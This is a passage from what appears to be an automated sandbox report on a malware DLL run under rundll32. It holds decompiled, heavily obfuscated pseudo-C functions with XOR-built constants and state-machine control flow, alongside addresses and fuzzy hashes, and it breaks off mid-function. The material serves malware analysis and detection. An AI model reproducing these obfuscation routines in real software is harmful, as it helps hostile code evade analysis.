				_v8 = _v8 ^ 0xb774c662;
				_v28 = 0x1b91;
				_v28 = _v28 ^ 0xac548ac7;
				_v28 = _v28 * 0x57;
				_v28 = _v28 + 0xffff181d;
				_v28 = _v28 ^ 0x90bc1e59;
				_v32 = 0x7551;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0xb8e7ca91;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x3ad707f4;
				_t121 =  *0x10021404; // 0x0
				while(_t134 != 0x472a097) {
					if(_t134 == 0x148a4b2c) {
						_t111 = E1001D1E3(_v36, _t121, _v4, _t121, _t121, _v12);
						_t121 =  *0x10021404; // 0x0
						_t136 =  &(_t136[5]);
						_t134 = 0x472a097;
						 *_t121 = _t111;
						continue;
					} else {
						if(_t134 != 0x35b1160f) {
							L8:
							if(_t134 != 0xfe78997) {
								continue;
							}
						} else {
							_push(_t121);
							_t123 = 0x18;
							_t121 = E100157E8(_t123);
							 *0x10021404 = _t121;
							if(_t121 != 0) {
								_t134 = 0x148a4b2c;
								continue;
							}
						}
					}
					return 0 | _t121 != 0x00000000;
				}
				_t110 = E1000D6D8(_v20, _v24, _t121, E10016B45, _v8, _t121, 0, _t121, _t121, _v28, _v32);
				_t121 =  *0x10021404; // 0x0
				_t136 =  &(_t136[9]);
				_t134 = 0xfe78997;
				 *((intOrPtr*)(_t121 + 0x14)) = _t110;
				goto L8;
			}

0x1001b1d2
0x1001b1d5
0x1001b1de
0x1001b1e2
0x1001b1f2
0x1001b1f7
0x1001b1fd
0x1001b205
0x1001b20a
0x1001b217
0x1001b224
0x1001b22d
0x1001b235
0x1001b241
0x1001b246
0x1001b24c
0x1001b258
0x1001b25b
0x1001b25f
0x1001b267
0x1001b26f
0x1001b277
0x1001b27f
0x1001b287
0x1001b28c
0x1001b294
0x1001b29c
0x1001b2a4
0x1001b2ac
0x1001b2b4
0x1001b2bc
0x1001b2c4
0x1001b2cc
0x1001b2d9
0x1001b2e2
0x1001b2e6
0x1001b2ee
0x1001b2f6
0x1001b2fe
0x1001b303
0x1001b30b
0x1001b313
0x1001b320
0x1001b324
0x1001b32c
0x1001b334
0x1001b33c
0x1001b341
0x1001b34e
0x1001b352
0x1001b35a
0x1001b360
0x1001b366
0x1001b3a1
0x1001b3a6
0x1001b3ac
0x1001b3af
0x1001b3b1
0x00000000
0x1001b368
0x1001b36e
0x1001b3e7
0x1001b3e9
0x00000000
0x00000000
0x1001b370
0x1001b378
0x1001b37b
0x1001b382
0x1001b384
0x1001b38c
0x1001b38e
0x00000000
0x1001b38e
0x1001b38c
0x1001b36e
0x1001b3fd
0x1001b3fd
0x1001b3d4
0x1001b3d9
0x1001b3df
0x1001b3e2
0x1001b3e4
0x00000000

Strings

Qu, xrefs: 1001B334

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qu
API String ID: 0-3256286041
Opcode ID: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
Instruction ID: 993f58a08032508fbc2eaa32d8b7856b11afd01b2926fc56810c97954de9ad7b
Opcode Fuzzy Hash: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
Instruction Fuzzy Hash: 63519B72508301DFD348DF25D88690BBBF1FB88758F104A1DF499AA2A0D375DA56CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10018668, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10018668(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _t124;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t174;
				signed int _t175;
				void* _t179;

				_t179 = __eflags;
				_t174 = _a8;
				_push(_t174);
				_push(_a4);
				_push(__ecx);
				E100056B2(_t124);
				_v48 = _v48 & 0x00000000;
				_v60 = 0x2b6426;
				_v56 = 0x6e5114;
				_v52 = 0x76edce;
				_v28 = 0x79ec;
				_t153 = 0x78;
				_v28 = _v28 / _t153;
				_v28 = _v28 ^ 0x0000650d;
				_a8 = 0xe566;
				_a8 = _a8 + 0x6996;
				_t154 = 0x28;
				_a8 = _a8 * 0x2c;
				_a8 = _a8 << 6;
				_a8 = _a8 ^ 0x0e64e211;
				_v16 = 0x462c;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 * 0x1a;
				_v16 = _v16 ^ 0x012b18fd;
				_v8 = 0x3be2;
				_v8 = _v8 ^ 0xc0b2cfc2;
				_v8 = _v8 + 0xffff8202;
				_v8 = _v8 + 0xffff281a;
				_v8 = _v8 ^ 0xc0b1e356;
				_v32 = 0xe529;
				_v32 = _v32 | 0xad89a33e;
				_v32 = _v32 ^ 0xad89e9bc;
				_v12 = 0xc860;
				_v12 = _v12 / _t154;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00050c31;
				_v24 = 0x828e;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x00005687;
				_v20 = 0xf702;
				_v20 = _v20 << 5;
				_t155 = 0x19;
				_v20 = _v20 / _t155;
				_v20 = _v20 ^ 0x000138d2;
				_v40 = 0x21c7;
				_t156 = 0x48;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00003778;
				_v36 = 0x7572;
				_t157 = 0x45;
				_v36 = _v36 / _t157;
				_v36 = _v36 ^ 0x00006456;
				_v44 = E10017B6B();
				_a8 = 0x4920;
				_t158 = 0x7e;
				_a8 = _a8 / _t158;
				_a8 = _a8 ^ 0x00000090;
				_v28 = 0x69c4;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x00001a61;
				_t175 = E1000607F(_t158, _t179, _t158, _v28, _a8);
				E1000D940(_t174, _v20, _v40, _v36, 1,  &_v44, _t175);
				 *((short*)(_t174 + _t175 * 2)) = 0;
				return 0;
			}

0x10018668
0x10018670
0x10018673
0x10018674
0x10018678
0x10018679
0x1001867e
0x10018684
0x1001868b
0x10018692
0x10018699
0x100186a5
0x100186aa
0x100186af
0x100186b6
0x100186bd
0x100186c8
0x100186cb
0x100186ce
0x100186d2
0x100186d9
0x100186e4
0x100186eb
0x100186ee
0x100186f5
0x100186fc
0x10018703
0x1001870a
0x10018711
0x10018718
0x1001871f
0x10018726
0x1001872d
0x1001873b
0x1001873e
0x10018742
0x10018749
0x10018750
0x10018754
0x10018758
0x1001875f
0x10018766
0x1001876d
0x10018772
0x10018777
0x1001877e
0x10018788
0x1001878d
0x10018792
0x10018799
0x100187a3
0x100187a6
0x100187a9
0x100187bb
0x100187c0
0x100187cc
0x100187d2
0x100187d5
0x100187dc
0x100187e3
0x100187e7
0x10018806
0x1001881d
0x10018827
0x10018830

Strings

&d+, xrefs: 10018684

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &d+
API String ID: 0-1856812195
Opcode ID: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
Instruction ID: b02ba9efede8e0657d026f88a3113f5aed79929258dc51e3690d2409ff298ab4
Opcode Fuzzy Hash: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
Instruction Fuzzy Hash: C6511671D00209ABEF08CFA5D94A9EEBBB6FF44314F10C059E514AB290D7B99A54CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000D44C, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E1000D44C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _t130;
				void* _t135;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;

				_t135 = __ecx;
				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(0x104);
				_push(__edx);
				_push(__ecx);
				E100056B2(0x104);
				_v8 = 0xbcd1;
				_t158 = 0;
				_t152 = 0x36;
				_v8 = _v8 * 0x2e;
				_v8 = _v8 / _t152;
				_v8 = _v8 ^ 0x7bcd9522;
				_v8 = _v8 ^ 0x7bcd7ef1;
				_v20 = 0xd074;
				_t153 = 0x7c;
				_v20 = _v20 / _t153;
				_t154 = 7;
				_v20 = _v20 / _t154;
				_v20 = _v20 ^ 0x00001e29;
				_v32 = 0xd525;
				_v32 = _v32 << 0xf;
				_t155 = 0x6c;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x00fcbc52;
				_v28 = 0x5229;
				_v28 = _v28 | 0x68e90e22;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xe95e5e4c;
				_v24 = 0xbbdc;
				_v24 = _v24 + 0xffff5b85;
				_t156 = 0x2b;
				_v24 = _v24 * 0x5a;
				_v24 = _v24 ^ 0x000800d6;
				_v12 = 0x4595;
				_v12 = _v12 | 0x5bffd677;
				_v12 = _v12 + 0xffff91eb;
				_v12 = _v12 ^ 0x5bff1f9a;
				_v48 = 0x86a3;
				_v48 = _v48 | 0x766d4cfb;
				_v48 = _v48 ^ 0x766ddf16;
				_v36 = 0x4caf;
				_v36 = _v36 | 0x279090db;
				_v36 = _v36 + 0xdfe5;
				_v36 = _v36 ^ 0x2791e7d1;
				_v44 = 0x2a6e;
				_v44 = _v44 + 0xffff210b;
				_v44 = _v44 ^ 0xffff72fc;
				_v16 = 0x7a4e;
				_v16 = _v16 / _t156;
				_v16 = _v16 << 7;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x008e4fe7;
				_v40 = 0x3228;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00001001;
				_t130 = E10003B31(__ecx, __ecx, __ecx, _v40);
				_t157 = _t130;
				if(_t130 != 0) {
					_push(_t135);
					_t158 = E1000C62B(_a8, _v32, _v28, _t157, _v24,  &_v52, _v12);
					E100078F0(_t157, _v48, _v36, _v44, _v16);
				}
				return _t158;
			}

0x1000d44c
0x1000d454
0x1000d45c
0x1000d45f
0x1000d462
0x1000d465
0x1000d466
0x1000d467
0x1000d468
0x1000d46d
0x1000d47d
0x1000d481
0x1000d482
0x1000d48c
0x1000d491
0x1000d498
0x1000d49f
0x1000d4a9
0x1000d4ae
0x1000d4b6
0x1000d4bb
0x1000d4c0
0x1000d4c7
0x1000d4ce
0x1000d4d5
0x1000d4da
0x1000d4df
0x1000d4e6
0x1000d4ed
0x1000d4f4
0x1000d4f8
0x1000d4ff
0x1000d506
0x1000d511
0x1000d512
0x1000d515
0x1000d51c
0x1000d523
0x1000d52a
0x1000d531
0x1000d538
0x1000d53f
0x1000d546
0x1000d54d
0x1000d554
0x1000d55b
0x1000d562
0x1000d569
0x1000d570
0x1000d577
0x1000d57e
0x1000d58a
0x1000d58d
0x1000d595
0x1000d598
0x1000d59f
0x1000d5a8
0x1000d5ac
0x1000d5be
0x1000d5c3
0x1000d5ca
0x1000d5cc
0x1000d5eb
0x1000d5f6
0x1000d5fb
0x1000d605

Strings

L^^, xrefs: 1000D4F8

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: L^^
API String ID: 0-295340116
Opcode ID: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
Instruction ID: 5b9d8352787a9756c3e64560f2c9cebd3d80172517012275b39b5e8c23ac1851
Opcode Fuzzy Hash: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
Instruction Fuzzy Hash: FF514775D00209EBEF04CFA9D94A8EEFBB5FB84314F208159E511B6260D3795A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF11, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

K\n, xrefs: 1000CF4D

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K\n
API String ID: 0-1066067252
Opcode ID: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
Instruction ID: 5fd8320ada1694ee6555ad69e33bb7130fac323d7898873b8d76c28e81ceb8ae
Opcode Fuzzy Hash: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
Instruction Fuzzy Hash: 78310576D0020CFBDF05CFE5C8898DEBBB1FB48304F108199EA18A6250D3B59A65DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A83A, Relevance: .2, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000A83A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v148;
				void* _t186;
				void* _t214;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr* _t250;
				signed int* _t251;
				void* _t252;
				void* _t253;

				_push(_a12);
				_t250 = _a8;
				_t251 = __ecx;
				_push(_t250);
				_push(_a4);
				_push(__ecx);
				E100056B2(_t186);
				_v84 = _v84 & 0x00000000;
				_t253 = _t252 + 0x14;
				_v96 = 0x42e790;
				_v92 = 0x166b03;
				_t229 = 0x403bd71;
				_v88 = 0x3f33f0;
				_v8 = 0xe45a;
				_v8 = _v8 + 0x5419;
				_v8 = _v8 + 0xffff7773;
				_v8 = _v8 + 0xffff99fb;
				_v8 = _v8 ^ 0x000024f5;
				_v64 = 0xf2de;
				_v64 = _v64 >> 5;
				_v64 = _v64 ^ 0x00005589;
				_v56 = 0x66c2;
				_v56 = _v56 + 0xffff7624;
				_v56 = _v56 ^ 0xfffffb7f;
				_v80 = 0x220;
				_t222 = 0x62;
				_v80 = _v80 * 0x53;
				_v80 = _v80 ^ 0x0000e004;
				_v12 = 0x437a;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0x349b;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00026b25;
				_v76 = 0x38de;
				_v76 = _v76 ^ 0x7523cf62;
				_v76 = _v76 ^ 0x75239d7e;
				_v68 = 0x7c01;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x00006094;
				_v20 = 0xa4cb;
				_v20 = _v20 / _t222;
				_t223 = 0x21;
				_v20 = _v20 * 0xf;
				_v20 = _v20 / _t223;
				_v20 = _v20 ^ 0x00005a84;
				_v52 = 0x5274;
				_t224 = 0x27;
				_v52 = _v52 * 0x22;
				_v52 = _v52 ^ 0x000a8141;
				_v36 = 0x5a3a;
				_v36 = _v36 ^ 0x52f32f2b;
				_v36 = _v36 ^ 0xad8d6857;
				_v36 = _v36 ^ 0xff7e4623;
				_v60 = 0x640e;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 ^ 0x000ab987;
				_v48 = 0xd288;
				_v48 = _v48 + 0x2c37;
				_v48 = _v48 / _t224;
				_v48 = _v48 ^ 0x00004291;
				_v28 = 0x54fc;
				_t225 = 0x60;
				_v28 = _v28 * 0x66;
				_v28 = _v28 << 0xd;
				_v28 = _v28 ^ 0x3b8d04ed;
				_v40 = 0x2878;
				_v40 = _v40 / _t225;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x0001c54a;
				_v32 = 0x68e5;
				_v32 = _v32 + 0xffffcd4c;
				_v32 = _v32 | 0x885dfaf7;
				_v32 = _v32 ^ 0x885dba23;
				_v44 = 0x878a;
				_v44 = _v44 | 0xeb76a9e1;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x0075e19b;
				_v72 = 0x39a;
				_t226 = 0x64;
				_v72 = _v72 / _t226;
				_v72 = _v72 ^ 0x00000009;
				_v16 = 0xa456;
				_v16 = _v16 + 0x7679;
				_v16 = _v16 | 0x2099d5c3;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0xea13369a;
				_v24 = 0xa266;
				_v24 = _v24 >> 6;
				_v24 = _v24 | 0x0bc7efd3;
				_v24 = _v24 ^ 0x2d3320f9;
				_v24 = _v24 ^ 0x26f4c722;
				while(_t229 != 0x403bd71) {
					if(_t229 == 0xd2426f1) {
						E10018582(_v28, _t250 + 4, __eflags, _v40,  &_v148, _v32, _v44);
					} else {
						if(_t229 == 0x30c0e3fb) {
							_t231 = _t250;
							_t251[1] = E1001DD78(_t231);
							_push(_t231);
							_t214 = E1000607F(_t231, __eflags, _t231, _v24, _v16);
							_t253 = _t253 + 0x10;
							_t229 = 0x39b72fa5;
							_t251[1] = _t251[1] + _t214;
							continue;
						} else {
							if(_t229 == 0x36f770cf) {
								E1001F3E9(_v68, _v20, _v52, _t251,  &_v148);
								_t253 = _t253 + 0xc;
								_t229 = 0x388f3786;
								continue;
							} else {
								if(_t229 == 0x388f3786) {
									E1000CD04(_v36,  *_t250, _v60,  &_v148, _v48);
									_t253 = _t253 + 0xc;
									_t229 = 0xd2426f1;
									continue;
								} else {
									if(_t229 != 0x39b72fa5) {
										L13:
										__eflags = _t229 - 0x7f1da96;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t229);
										_t221 = E100157E8(_t251[1]);
										 *_t251 = _t221;
										if(_t221 != 0) {
											_t229 = 0x36f770cf;
											continue;
										}
									}
								}
							}
						}
					}
					__eflags =  *_t251;
					_t185 =  *_t251 != 0;
					__eflags = _t185;
					return 0 | _t185;
				}
				_t229 = 0x30c0e3fb;
				 *_t251 =  *_t251 & 0x00000000;
				__eflags =  *_t251;
				_t251[1] = _v72;
				goto L13;
			}

0x1000a846
0x1000a849
0x1000a84c
0x1000a84e
0x1000a84f
0x1000a853
0x1000a854
0x1000a859
0x1000a85d
0x1000a860
0x1000a869
0x1000a870
0x1000a875
0x1000a87c
0x1000a883
0x1000a88a
0x1000a891
0x1000a898
0x1000a89f
0x1000a8a6
0x1000a8aa
0x1000a8b1
0x1000a8b8
0x1000a8bf
0x1000a8c6
0x1000a8d3
0x1000a8d6
0x1000a8d9
0x1000a8e0
0x1000a8e7
0x1000a8eb
0x1000a8f2
0x1000a8f6
0x1000a8fd
0x1000a904
0x1000a90b
0x1000a912
0x1000a919
0x1000a91d
0x1000a924
0x1000a932
0x1000a939
0x1000a93c
0x1000a946
0x1000a949
0x1000a950
0x1000a95b
0x1000a95c
0x1000a95f
0x1000a966
0x1000a96d
0x1000a974
0x1000a97b
0x1000a982
0x1000a98d
0x1000a990
0x1000a997
0x1000a99e
0x1000a9aa
0x1000a9ad
0x1000a9b4
0x1000a9c3
0x1000a9c6
0x1000a9c9
0x1000a9cd
0x1000a9d4
0x1000a9e2
0x1000a9e5
0x1000a9e9
0x1000a9f0
0x1000a9f7
0x1000a9fe
0x1000aa05
0x1000aa0c
0x1000aa13
0x1000aa1a
0x1000aa1e
0x1000aa25
0x1000aa2f
0x1000aa37
0x1000aa3a
0x1000aa3e
0x1000aa45
0x1000aa4c
0x1000aa57
0x1000aa5a
0x1000aa61
0x1000aa68
0x1000aa6c
0x1000aa73
0x1000aa7a
0x1000aa81
0x1000aa93
0x1000ab80
0x1000aa99
0x1000aa9f
0x1000ab1b
0x1000ab22
0x1000ab31
0x1000ab39
0x1000ab3e
0x1000ab41
0x1000ab46
0x00000000
0x1000aaa1
0x1000aaa3
0x1000ab09
0x1000ab0e
0x1000ab11
0x00000000
0x1000aaa5
0x1000aaab
0x1000aae9
0x1000aaee
0x1000aaf1
0x00000000
0x1000aaad
0x1000aab3
0x1000ab5c
0x1000ab5c
0x1000ab62
0x00000000
0x00000000
0x1000ab68
0x1000aab9
0x1000aabf
0x1000aac3
0x1000aac8
0x1000aacd
0x1000aad3
0x00000000
0x1000aad3
0x1000aacd
0x1000aab3
0x1000aaab
0x1000aaa3
0x1000aa9f
0x1000ab8a
0x1000ab8e
0x1000ab8e
0x1000ab95
0x1000ab95
0x1000ab51
0x1000ab56
0x1000ab56
0x1000ab59
0x00000000

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
Instruction ID: 3e953d3043e1b2612aa2013cd6f624c31347c1387879b6d22a10554e2811d0ce
Opcode Fuzzy Hash: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
Instruction Fuzzy Hash: FAA135B5D00209DBEF18CFA5D98A5EEFBB2FF04348F208119E511BA290D7B95A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1001D2CB, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001D2CB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t102;
				intOrPtr _t117;
				signed int _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t145;

				_push(_a8);
				_push(_a4);
				_push(0x10021000);
				_push(__ecx);
				E100056B2(_t102);
				_v8 = 0x5955;
				_t126 = 0x64;
				_v8 = _v8 / _t126;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0003dad4;
				_v32 = 0x6516;
				_v32 = _v32 + 0xffff2696;
				_v32 = _v32 ^ 0xffff8a6f;
				_v12 = 0xe36b;
				_t127 = 0x33;
				_v12 = _v12 / _t127;
				_v12 = _v12 | 0x8ae53edf;
				_t128 = 0x55;
				_v12 = _v12 * 0x17;
				_v12 = _v12 ^ 0x7a98878f;
				_v24 = 0xe515;
				_v24 = _v24 * 0x63;
				_t129 = 0x24;
				_v24 = _v24 / _t128;
				_v24 = _v24 ^ 0x00017ed2;
				_v20 = 0x2395;
				_v20 = _v20 | 0xb3f3aeab;
				_v20 = _v20 + 0xaf88;
				_v20 = _v20 ^ 0xb3f45cc9;
				_v28 = 0x9af0;
				_v28 = _v28 * 0x39;
				_v28 = _v28 ^ 0xd7063ba5;
				_v28 = _v28 ^ 0xd7241e55;
				_v44 = 0x4d1f;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x00005248;
				_v40 = 0x8238;
				_t130 = 0x44;
				_v40 = _v40 / _t129;
				_v40 = _v40 ^ 0x00002f18;
				_v36 = 0x2afb;
				_v36 = _v36 ^ 0xf2c87ef6;
				_v36 = _v36 ^ 0xf2c81ca8;
				_v16 = 0xbb48;
				_v16 = _v16 | 0x7786f7dc;
				_v16 = _v16 ^ 0x7786ffdc;
				_t117 = E100157E8(_t130);
				 *0x100221c0 = _t117;
				if(_t117 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t117 + 4)) = 0x10021000;
				 *((intOrPtr*)(_t117 + 0x18)) = 0x10021000;
				_t132 =  *0x100221c0;
				_t145 =  *((intOrPtr*)(_t132 + 4));
				 *(_t132 + 0x40) = _v16;
				_t120 =  *(_t132 + 0x28);
				while( *((intOrPtr*)(_t145 + _t120 * 8)) != 0) {
					_t120 = _t120 + 1;
					 *(_t132 + 0x28) = _t120;
				}
				if(E1001E19F(_v24, _v20, _a8) == 0) {
					E100091CD(_v28, _v44, _v40,  *0x100221c0, _v36);
					goto L7;
				}
				return 1;
			}

0x1001d2d2
0x1001d2da
0x1001d2dd
0x1001d2de
0x1001d2df
0x1001d2e4
0x1001d2f2
0x1001d2f7
0x1001d2fc
0x1001d300
0x1001d304
0x1001d30b
0x1001d312
0x1001d319
0x1001d320
0x1001d32a
0x1001d32f
0x1001d334
0x1001d33f
0x1001d342
0x1001d345
0x1001d34c
0x1001d357
0x1001d35f
0x1001d360
0x1001d365
0x1001d36f
0x1001d376
0x1001d37d
0x1001d384
0x1001d38b
0x1001d398
0x1001d39b
0x1001d3a2
0x1001d3a9
0x1001d3b0
0x1001d3b4
0x1001d3bb
0x1001d3c7
0x1001d3c8
0x1001d3cb
0x1001d3d2
0x1001d3d9
0x1001d3e0
0x1001d3e7
0x1001d3ee
0x1001d3f5
0x1001d402
0x1001d407
0x1001d40f
0x1001d46b
0x00000000
0x1001d46b
0x1001d411
0x1001d414
0x1001d41a
0x1001d420
0x1001d423
0x1001d426
0x1001d42f
0x1001d42b
0x1001d42c
0x1001d42c
0x1001d44a
0x1001d463
0x00000000
0x1001d468
0x00000000

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
Instruction ID: 32c1e0764edadb428603f859bd3287ae8af053e8bec179c7a9d038295433632f
Opcode Fuzzy Hash: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
Instruction Fuzzy Hash: 56513675D00209EFDB08DFA4D98A5DEBBF1FB09314F20805AD505BB290D7B59A91CF94

Uniqueness

Uniqueness Score: -1.00%

Function 100173C0, Relevance: .1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100173C0(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t149;
				signed int _t150;
				void* _t153;

				_t153 = __eflags;
				_v24 = 0x158c;
				_v24 = _v24 | 0xc19b8b86;
				_v24 = _v24 + 0xffffcdb5;
				_v24 = _v24 ^ 0xc19b1e12;
				_v8 = 0x1996;
				_v8 = _v8 + 0xffffce0e;
				_t149 = __ecx;
				_v8 = _v8 * 0x33;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0xffeca024;
				_v40 = 0x2715;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000a273;
				_v12 = 0x2149;
				_v12 = _v12 << 1;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x1e3791f4;
				_v12 = _v12 ^ 0x1e37d0cb;
				_v28 = 0xe2f1;
				_v28 = _v28 << 3;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x001c0c8b;
				_v36 = 0x4110;
				_v36 = _v36 + 0xffff4283;
				_v36 = _v36 ^ 0xffffc6f6;
				_v20 = 0x5435;
				_v20 = _v20 >> 4;
				_v20 = _v20 << 7;
				_t138 = 0xe;
				_v20 = _v20 / _t138;
				_v20 = _v20 ^ 0x00005afa;
				_v16 = 0x4238;
				_v16 = _v16 + 0xe21;
				_v16 = _v16 ^ 0xb01b9cfe;
				_v16 = _v16 ^ 0x6bc8f8c5;
				_v16 = _v16 ^ 0xdbd331c2;
				_v32 = 0x5416;
				_t139 = 0x7b;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 >> 0x10;
